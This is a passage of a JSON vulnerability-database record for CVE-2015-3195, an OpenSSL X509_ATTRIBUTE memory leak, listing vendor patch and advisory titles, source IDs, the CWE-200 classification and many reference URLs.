        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380"
      },
      {
        "title": "Release Strategy",
        "trust": 0.8,
        "url": "https://www.openssl.org/policies/releasestrat.html"
      },
      {
        "title": "OpenSSL 1.0.2 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html"
      },
      {
        "title": "OpenSSL 1.0.1 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html"
      },
      {
        "title": "OpenSSL 1.0.0 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.0-notes.html"
      },
      {
        "title": "OpenSSL 0.9.8 Series Release Notes",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-0.9.8-notes.html"
      },
      {
        "title": "Fix leak with ASN.1 combine.",
        "trust": 0.8,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=cc598f321fbac9c04da5766243ed55d55948637d"
      },
      {
        "title": "X509_ATTRIBUTE memory leak (CVE-2015-3195)",
        "trust": 0.8,
        "url": "http://openssl.org/news/secadv/20151203.txt"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "title": "Oracle Linux Bulletin - October 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "title": "Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "title": "April 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update"
      },
      {
        "title": "January 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update"
      },
      {
        "title": "October 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update"
      },
      {
        "title": "July 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
      },
      {
        "title": "TLSA-2015-20",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-20j.html"
      },
      {
        "title": "Patch for OpenSSL X509_ATTRIBUTE Structure Information Disclosure Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/67698"
      },
      {
        "title": "OpenSSL ASN1_TFLG_COMBINE Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=58937"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152616 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152617 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2015-3195",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3195"
      },
      {
        "title": "Debian Security Advisories: DSA-3413-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=82bedc073c0f22b408ebaf092ed8621c"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2830-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2015-614",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-614"
      },
      {
        "title": "Tenable Security Advisories: [R7] OpenSSL \u002720151203\u0027 Advisory Affects Tenable SecurityCenter",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-01"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in OpenSSL (December 2015) Affecting Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151204-openssl"
      },
      {
        "title": "Forcepoint Security Advisories: CVE-2015-3194, 3195, 3196 -- Security Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=62ab21cc073446940abce12c35db3049"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory"
      },
      {
        "title": "Symantec Security Advisories: SA105 : OpenSSL Vulnerabilities 3-Dec-2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a924415f718a299b2d1e8046890941f3"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3195 "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.debian.org/security/2015/dsa-3413"
      },
      {
        "trust": 1.9,
        "url": "http://openssl.org/news/secadv/20151203.txt"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2616.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/78626"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 1.8,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151204-openssl"
      },
      {
        "trust": 1.8,
        "url": "http://fortiguard.com/advisory/openssl-advisory-december-2015"
      },
      {
        "trust": 1.8,
        "url": "http://www.fortiguard.com/advisory/openssl-advisory-december-2015"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 1.8,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944173"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05111017"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05131085"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05398322"
      },
      {
        "trust": 1.8,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40100"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/ht206167"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-december/173801.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2617.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1034294"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00017.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00070.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00071.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00087.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00103.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00009.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2830-1"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=145382583417444\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "trust": 1.7,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2015\u0026m=slackware-security.754583"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10733"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=cc598f321fbac9c04da5766243ed55d55948637d"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu95113540/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu97668313"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3195"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.7,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=cc598f321fbac9c04da5766243ed55d55948637d"
      },
      {
        "trust": 0.6,
        "url": "https://www.openssl.org/news/secadv/20151203.txt"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2015-3195"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2109"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2106"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2105"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-4459"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2108"
      },
      {
        "trust": 0.2,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.2,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/2688611"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/solutions/222023"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-4000"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-3110"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-3183"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10733"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10759"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10761"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=145382583417444\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2015\u0026amp;m=slackware-security.754583"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2015:2616"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2830-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42530"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05398322"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3193"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1794"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7995"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3237"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05111017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4969"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05130958"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/info/insightcontrol"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-2054.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/6.4/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659"
      },
      {
        "trust": 0.1,
        "url": "https://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht206171"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1838"
      },
      {
        "trust": 0.1,
